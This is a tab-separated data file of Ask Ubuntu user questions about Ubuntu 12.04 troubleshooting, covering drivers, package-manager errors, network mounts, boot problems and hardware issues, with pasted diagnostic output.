177979	laptop turns off completely when watching flash video ( s ) online . how to fix it ?	i have dell inspitron 1525 which is on dual boot with windows 7 and ubuntu 12.04 . when i watch flash videos online in ubuntu , laptop turns off completely . i have to restart it again . this happens especially for long videos , after few minutes of run time . i have a dell inspiron 1545 too , which is running only on ubuntu 12.04 and i have never experienced such problem on it . i used live cd for making the prior dual boot . what maybe the causing this problem ?
177980	errno=-32 is showing up on installation of ubuntu 12	i get errno=-32 when trying to instal ubuntu 12 on a macbook pro . is there some one that can tell me what errno=-32 means ?
177982	software center not progress showing mergelist error	i am unable to run ubuntu software center in ubuntu 12.04 . it closes suddenly.unable to send a bug report even.i 'm new to ubuntu.my system is 64 bit os.please guide me to do it . i tried to follow your following answers , answer 1 prasath @ prasath-system-product-name : ~ $ sudo apt-get purge software-center [ sudo ] password for prasath : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_jd-team_jdownloader_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . prasath @ prasath-system-product-name : ~ $ answer 2 prasath @ prasath-system-product-name : ~ $ sudo apt-get remove software-center [ sudo ] password for prasath : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_jd-team_jdownloader_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . prasath @ prasath-system-product-name : ~ $ sudo apt-get autoremove software-center reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_jd-team_jdownloader_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . answer 3 prasath @ prasath-system-product-name : ~ $ sudo rm /etc/apt/sources.list.d/yannubuntu* & & sudo apt-get update [ sudo ] password for prasath : rm : can not remove `/etc/apt/sources.list.d/yannubuntu* ' : no such file or directory prasath @ prasath-system-product-name : ~ $ i tried the deepin software center also . but unable to make it . please explain me to do it . thanks .
177983	ca n't mount cifs drive	i have a number of fstab entries that will no longer mount . they used to work under 10.04 and after i did a clean install of 12.04 , they did work for a while although they would periodically hang up and become unresponsive until they were unmounted `` lazily '' and then remounted . now , i ca n't mount them at all . the shares all mount fine in nautilus . when trying to mount commandline : sudo mount -t cifs //target/share /shares/mount_point -o user=username , password=password nothing happens . it just sits there ; no error , no messages in the logs , no timeout ( ! ) so far as i have left it trying ( minutes ) . no messages come up in the remote computer 's logs ( windows ) . this appears to be the same problem that appears here : smbfs/cifs wo n't mount however , all my packages are up-to-date and higher versions than those listed in the solution to the above . any suggestions ?
177985	natting in ubuntu server	my server has two nic , one is connected to the internet service provider with dhcp ip ( dynamically change ) given by isp and other nic is connected with local switch with 192.168.1.1 ip . now i want to set up network with such that computers connected with lan can connect internet through server . server will be work as a router . how should i make such configuration that all traffic passed by nic 2 within a single ip and ported at ip address of nic 1 which is dynamically given by my isp ? thanks in advance .
177987	why do some programs create double indicators on the top panel ?	i have several apps that use indicators . always , when i activate a particular app , hotot for example , a window and indicator appears on my top panel . if i close the app using the x button , the hotot window closes and minimizes to the top panel . when i click on hotot from my launcher ( it is locked on my launcher ) instead of simply opening a window it opens a window and another indicator , which doubles the hotot indicators on my top panel . is there a way to stop that ? it usually happens with hotot and jdownloader .
177990	sudden graphical glitches in wine	i have been using ubuntu since 9.10 and have always gamed in wine without an issue . i have been running 12.04 since its release and have been playing the sims3 and wow in ubuntu flawlessly . however i recently upgraded my video card from a radeon hd 6850 to a hd7870 , when i did the upgrade i reformatted and reinstalled ubuntu 12.04 with the version of fglrx available through jockey . now when i run games in wine they still play ok and 90 % of the graphics are there , but not all . for example in the sims3 everything renders just fine except the trees , they render as green cubes with the texture displaying as a flat image protruding from the center . there is a screen shot below . wow is n't any better , flags and banners in the game just display as large textured rectangles , however wow is so bad it wont even load completely into the game , but the errors are evident on the character select screen . i am not sure what to do , i had both of these games running fine with the same fglrx version just a few weeks ago , and now they do not work properly . i know its not a hardware issue seeing how all these games run flawlessly in windows , if i can get 50-60 fps in bf3 on ultra , then i think the card is ok . i attempted to install the ( post release updates ) version of fglrx but it fails every time ( seems to be a know issue , so its not just me . ) i installed `` fglrx-updates '' and the corresponding amdcccle package through synaptic , and it broke my system , so i had to remove them and revert back to the open source driver . lastly i attempted to install the latest driver from the amd website , it installed with no errors however once i restarted i was still using the open source driver and the catalyst control center was nowhere to be found even though the software center claimed that it was installed . i am out of ideas , any help would be very appreciated . thank you .
177993	wireless connection intermittent on 12.04	i have a rosewill rnx-n300 pci wireless card , and since installing 12.04 the connection intermittently stops receiving data . the problem seems to be worse when downloading files , whether from the web , update manager , or from the software center . the network manager never shows loss of connection , and disconnecting then reconnecting wireless solves the issue . disabling -n speed in terminal improved performance a bit . i have also disabled power management for the device with ( i think ) iwconfig , in addition to disabling the -n speed setting . i have also tried disabling ipv6 .
177996	how do i patch minecraft 's lwjgl libraries ?	i just downloaded a free version of minecraft and i also downloaded jdk 6 and 7/jre 7 . i can open minecraft perfectly and log in but after it installs updates , it stays at a black screen . i need to update my lwjgl files but there is no .bin folder in my minecraftsp.jar folder . any tips ? that is what my minecraft folder contains .
177997	how to recover grub for ubuntu after windows 7 installation	i installed ubuntu 12.04 then i installed windows 7 . but as soon as i restarted my win 7 there was no boot option to select from ... the boot option to select operating system just disappeared . i tried reinstalling ubuntu 12.04 but no use ... still my pc boots straight into windows 7 .
178001	how do i restore a specific folder from an encrypted backup ?	i was wondering how to restore from an encrypted backup but only restore the videos directory in the backup ? the backup is stored on ubuntu one and i 'm using 12.04 .
178002	how can i lock the keyboard and mouse when playing video	i 'd like to set up my ubuntu 12.04 laptop so that i can play a video on loop while my computer is unattended , while not allowing anyone to take over without a password . i think this could go one of two ways , but both seem unneccesarily difficult or hacky : find a video player that can lock the keyboard and mouse with a password , or use the normal ubuntu lockdown with a screensaver that plays a video on loop . unfortunately , i 'm having trouble finding an easy way to do ( 1 ) and it looks like ubuntu does n't even have screensavers any more , so ( 2 ) is difficult as well . any suggestions about the best way to do this would be helpful .
178009	how do i install drivers for the alfa awus036h usb wireless adapter ?	i bought this network adapter from amazon and i do n't know how to install the drivers . the adapter comes with a cd for drivers and when i put it in , it has .autorun.exe autorun.ico autorun.csp , and autorun.inf . i know that is supports linux because when i installed them on my windows ( dual-boot ) it asked me if i wanted to linux drivers , mac , or windows .
178011	script to periodically open a file at certain intervals ?	i would like to write a script that would open a excel file periodically after certain intervals . how do i do it ?
178016	how do i keep track of failed ssh log-in attempts ?	i 'd like to see if somebody has been trying to log-in by brute-force into my ubuntu 12.04 server over ssh . how can i see if such activities have been taking place ?
178020	usb hub not working properly ubuntu 12.04	usb hub acting strange on ubuntu 12.04 lts . on windows all devices are working properly , but on ubuntu there are several issues , so it is not hardware issue . hdd is not recognised , unless it is the only device attached to hub . otherwise it switches off after 1 sec , restarts , switches off - infinite loop . adding and removing modem restarts rest of devices . when any of the devices are working with full performance , mouse signal becomes really week and sometimes lags . what kind of daemon has possessed my ubuntu 12.04 ? update : link to trust website usb hub model scheme : samsung laptop < - usb2 wire < - usb hub < - phone , hdd,4g modem , mouse receiver . output of lsusb -v -t 2-1.2.1:1.3 : no such file or directory 2-1.2.2:1.2 : no such file or directory 2-1.2.2:1.4 : no such file or directory / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci_hcd/3p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/8p , 480m |__ port 2 : dev 3 , if 0 , class=hub , driver=hub/4p , 480m |__ port 1 : dev 4 , if 0 , class=vend. , driver=option , 480m |__ port 1 : dev 4 , if 1 , class=vend. , driver=option , 480m |__ port 1 : dev 4 , if 2 , class=vend. , driver=option , 480m |__ port 1 : dev 4 , if 3 , class=vend. , driver= , 480m |__ port 1 : dev 4 , if 4 , class=stor. , driver=usb-storage , 480m |__ port 1 : dev 4 , if 5 , class=stor. , driver=usb-storage , 480m |__ port 2 : dev 8 , if 0 , class=comm. , driver=cdc_acm , 480m |__ port 2 : dev 8 , if 1 , class=data , driver=cdc_acm , 480m |__ port 2 : dev 8 , if 2 , class=vend. , driver= , 480m |__ port 2 : dev 8 , if 3 , class=stor. , driver=usb-storage , 480m |__ port 2 : dev 8 , if 4 , class=vend. , driver= , 480m |__ port 3 : dev 5 , if 0 , class=hid , driver=usbhid , 1.5m |__ port 3 : dev 5 , if 1 , class=hid , driver=usbhid , 1.5m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci_hcd/3p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 1 : dev 3 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 1 : dev 3 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m output of lsmod module size used by ppp_deflate 13038 0 zlib_deflate 27139 1 ppp_deflate bsd_comp 12994 0 ppp_async 17539 0 crc_ccitt 12667 1 ppp_async vesafb 13844 1 xt_limit 12711 8 xt_tcpudp 12603 7 ipt_log 12919 8 ipt_masquerade 12759 0 xt_dscp 12629 0 ipt_reject 12576 1 nf_conntrack_irc 13383 0 nf_conntrack_ftp 13452 0 xt_state 12578 6 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep parport_pc 32866 0 binfmt_misc 17540 1 ppdev 17113 0 snd_hda_codec_hdmi 32474 4 snd_hda_codec_realtek 224066 1 cdc_acm 26858 0 snd_hda_intel 33773 5 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec arc4 12529 2 snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ath9k 132390 0 mac80211 506816 1 ath9k nvidia 12319264 53 snd_seq_midi 13324 0 joydev 17693 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event ath9k_common 14053 1 ath9k ath9k_hw 411151 2 ath9k , ath9k_common psmouse 87692 0 lp 17799 0 option 25932 0 usb_wwan 20491 1 option usbserial 47077 2 option , usb_wwan uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev video 19596 0 iptable_nat 13229 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq nf_nat 25891 2 ipt_masquerade , iptable_nat nf_conntrack_ipv4 19716 9 iptable_nat , nf_nat nf_conntrack 81926 7 ipt_masquerade , nf_conntrack_irc , nf_conntrack_ftp , xt_state , iptable_nat , nf_nat , nf_conntrack_ipv4 ath 24067 3 ath9k , ath9k_common , ath9k_hw serio_raw 13211 0 mac_hid 13253 0 snd 78855 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 parport 46562 3 parport_pc , ppdev , lp iptable_mangle 12734 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm iptable_filter 12810 1 ip_tables 27473 3 iptable_nat , iptable_mangle , iptable_filter x_tables 29846 11 xt_limit , xt_tcpudp , ipt_log , ipt_masquerade , xt_dscp , ipt_reject , xt_state , iptable_nat , iptable_mangle , iptable_filter , ip_tables cfg80211 205544 3 ath9k , mac80211 , ath samsung_laptop 14365 0 usbhid 47199 0 hid 99559 1 usbhid usb_storage 49198 0 uas 18180 0 sky2 59043 0 output of dmesg https : //gist.github.com/0ea81d14f47c3a99b5ae output of /var/log/kern.log https : //gist.github.com/17df3a1517efc72a2a3e output of lsusb -vvv https : //gist.github.com/5dc9895df2749f524b2e
178025	how do i recreate a deleted '/var/lib/dpkg ' directory ?	yesterday i had some problem with /var/lib/dpkg/lock during update . i knew that in such cases removing lock file could solve problem . so i tried to do it , but by mistake i removed all dpkg directory . so now i can not do any update , install , upgrade and so on . i try via software center , terminal , qapt , synaptic . none of these work because all of them do such operations via dpkg . and as my dpkg is corrupted , so i have problem . how can i completely restore dpkg ? i have downloaded dpkg_1.16.1.2ubuntu7_amd64.deb ( i use 64bit ubuntu 12.04 ) file , but what to do with it in terminal ? simple double-clicking on .deb opens software center and you already know , it does n't work . p.s . terminal gives such error : dpkg : error : can not read info directory : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 )
178026	lubuntu vs. lubuntu-desktop	i 've heard that lubuntu consumes less resources than ubuntu . is it because of the fact that lubuntu uses different desktop environment and window manager ? if so , would it be equivalent to install lubuntu-desktop on top of ubuntu rather than doing a fresh install ?
178040	scroll in microsoft usb mouse is not working properly	i found wonder that up to ubuntu 11.10 , my microsoft usb mouse scroll function worked properly , but after updating to 12.04 lts , it just jumping like unevenly and jumpy . i replaced the microsoft usb mouse with ball it works okay . please help to rectify .
178045	getting an error while installing 12.04 via wubi	i am currently running windows 7 ultimate with a 2gb ram and 500gb sata hdd and a 2.60 ghz intel dual core processor . i want to use ubuntu 12.04 alongside windows 7 . being a complete linux newbie , i would have preferred installation via wubi which successfully worked for me in version 11.04 . however , the wubi that comes with 12.04 does not allow installation in windows , so i 've tried installing by downloading the wubi standalone installer for windows and also by -- force-wubi . both approaches result in the following error : try ( hd0,1 ) : ntfs5 : error : `` prefix '' is not set i think wubi clearly had issues with ubuntu . is there any way i can get rid of this error ? or is there any other distro which works with wubi ?
178052	will 12.04 get libreoffice 3.6 and later ?	i see references to ppa 's , etc . for latest libreoffice . my question is more whether ubuntu 12.04 lts will get the latest stable releases of libreoffice going forward ?
178053	no wireless connection in ubuntu 12.04 on my laptop	i have recently installed the ubuntu 12.04 on my dell inspiron 15r through wubi inside windows ultimate 64 bit . but i can not see any wireless network as the network icon shows no notifications regarding wireless connection . may be the driver is not working . i have searched other threads and follow a thred to unistall bcm-kernel-source and then install the firmware-b43-installera and b43fwcutter . but it didnt till now . here are the results of lspci -vvv $ lspci -vvv 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : c0000000-c0ffffff prefetchable memory behind bridge : 00000000a0000000-00000000afffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 056a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 45 region 0 : memory at c1000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 42 region 0 : memory at c1600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 44 region 0 : memory at c1614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at c1619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 46 region 0 : memory at c1610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : fff00000-000fffff prefetchable memory behind bridge : 00000000c1400000-00000000c14fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 i/o behind bridge : 0000f000-00000fff memory behind bridge : c1500000-c15fffff prefetchable memory behind bridge : 00000000fff00000-00000000000fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 056a control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at c1618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : dell device 056a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 056a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 41 region 0 : i/o ports at 4088 [ size=8 ] region 1 : i/o ports at 4094 [ size=4 ] region 2 : i/o ports at 4080 [ size=8 ] region 3 : i/o ports at 4090 [ size=4 ] region 4 : i/o ports at 4060 [ size=32 ] region 5 : memory at c1617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : dell device 056a control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at c1615000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at 4040 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] ( prog-if 00 [ vga controller ] ) subsystem : dell device 056a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 47 region 0 : memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at c0000000 ( 64-bit , non-prefetchable ) [ size=128k ] region 4 : i/o ports at 3000 [ size=256 ] expansion rom at c0020000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci kernel modules : fglrx , radeon 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : dell device 056a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : i/o ports at 2000 [ size=256 ] region 2 : memory at c1404000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at c1400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) subsystem : dell device 0016 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at c1500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > here is the result of lshw -c $ sudo lshw -c network [ sudo ] password for arun : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 05 serial : d4 : be : d9:2d : d3:86 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=90.0.2.135 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c1404000-c1404fff memory : c1400000-c1403fff *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c1500000-c1507fff here is the result of rfkill list all $ rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no
178054	laptop usb ports stop working : how to restart them without restarting the pc ?	the usb ports of my laptop fail for some reason from time to time . this concerns apparently mainly the external mouse and keyboard connected by usb , while connecting an external hard disk to the same ports may activate them . all gets back to normal after restart . how could i get the same effect without restart ? since the issue reemerges after reinstalling os and due to random variations i have created a new question asking for a permanent solution.. in case i get an answer i will close this one . edit : /sys/module/usbcore/parameters/autosuspend contais only the line 2 . /sys/bus/usb/devices/usb2/power/autosuspend and /sys/bus/usb/devices/usb3/power/autosuspend contain 0 ( this was verified after solving the problem by restart , not before.. ) i do not see legacy usb support in bios i have edited and updated this question because i have some answers and comments here : but for new solutions please try answering my new question .
178057	ubuntu 12.04 reboots during startup	i have a clean installation of 12.04 32bit on dell gx620 usff . when i switch on computer after few hours ( when the computer is shut off ) , then computer reboots during startup . ubuntu logo appears then restart , this is repeated few times and then system starts normally . strange this is that this happens only when computer is shut off for long time , when i shut off computer and then switch on , ubuntu starts normally . i made memtest , changed bios battery , tried clean installation and nothing helps . please see the log file here .
178062	12.04 stills shows libre office updates even it is uninstalled	i uninstalled all libreoffice but the update manager still shows libreoffice updates , ( i uninstall it from software center ) . how do i remove this updates or remove libreoffice completely ?
178069	bumblebee : : can not access secondary gpu - error : could not load gpu driver	edit as of today , this was fixed by the latest nvidia-current update : ) until last week i had a working bumblee/nvidia set up . now , when i do optirun -vv firefox i 'm greeted by : [ 6174.504548 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 6174.632794 ] [ debug ] optirun version 3.0.1 starting ... [ 6174.632850 ] [ debug ] active configuration : [ 6174.632861 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 6174.632872 ] [ debug ] x display : :8 [ 6174.632883 ] [ debug ] ld_library_path : [ 6174.632893 ] [ debug ] socket path : /var/run/bumblebee.socket [ 6174.632902 ] [ debug ] vgl compression : proxy [ 6174.737261 ] [ info ] response : no - error : could not load gpu driver [ 6174.737309 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 6174.737329 ] [ debug ] socket closed . [ 6174.737365 ] [ error ] aborting because fallback start is disabled . [ 6174.737379 ] [ debug ] killing all remaining processes . dpkg -l | grep nvidia ii bumblebee-nvidia 3.0.1-1~preciseppa1 nvidia optimus support using the proprietary nvidia driver ii nvidia-common 1:0.2.44 find obsolete nvidia drivers ii nvidia-current 304.37-0ubuntu1~precise~xup1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current-updates 295.49-0ubuntu0.2 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 302.17-0ubuntu1~precise~xup3 tool of configuring the nvidia graphics driver ii nvidia-settings-updates 295.33-0ubuntu1 tool of configuring the nvidia graphics driver i 've seen some comments to the effect of deleting 10-nvidia-current-thinkpad-t420s.conf but doing ls /usr/share/x11/xorg.conf.d/ yields : 10-evdev.conf 11-evdev-trackpoint.conf 50-vmmouse.conf 51-synaptics-quirks.conf 11-evdev-quirks.conf 50-synaptics.conf 50-wacom.conf is there a way to fix this ?
178074	share only single screen with someone	so when i was on windows and working with a colleague i used to use webex and would share my desktop , i could lock it down to showing only a single monitor - i ca n't find a equivalent on ubuntu and was hoping someone could help ... my goal is to share only a single monitor ( i have two monitors currently setup in ubuntu at present ) . ideally i 'd like remote desktop sharing to support selective sharing , but it seams to share the whole desktop so the viewer gets 2 1920x1080 screens side by side ... which can be unwieldy . is there any way to restrict remote desktop sharing to this , or is there any other apps available that would do this ?
178075	whats the difference between tasksel and normal methods	recently i have gone through tasksel command usage because of lamp server setup . why ca n't i use apt-get or aptitude there ? why does the ubuntu wiki page suggest to do it with tasksel only . is there any specific reason ? where should tasksel be used ? whats going to happen if i use aptitude or apt-get instead of tasksel while installing the server .
178080	how to change cpu fan speed on thinkpad ?	i checked this post on askubuntu , but like the op my bios does not have a setting for 'smart fan ' . my bios though has something similar called 'thermal performance ' wherein it 's already set to maximum performance . but using hardware sensors indicator my fan speed barely reaches 3000 rpm ( it 's usually stuck around 2600 to 2700 rpm ) compared to the indicated rpm of my laptop which is 5400 rpm . there is a fan control setup for 10.04 specifically for thinkpad here but i do n't want to risk it since it 's meant for a rather outdated distro already . is there a way change the fan speed if i ca n't access it through bios ? i 'm using thinkpad r61i 12.04 64-bit , 160 gb hdd , intel t5870 , 4 gb ram .
178085	deluge bit torrent . no incoming connections ?	hi i keep getting a no incoming connections on my deluge . i know this is a pretty common problem from google , but i have posted here to see if any one knows why this happens . i have port forwarded my router and set deluge to the correct port range . is this just a bug ? it does not seem to affect the speed so i obviously do have incoming connections and transmission says the ports are open . so i guess my question is why is this happening ?
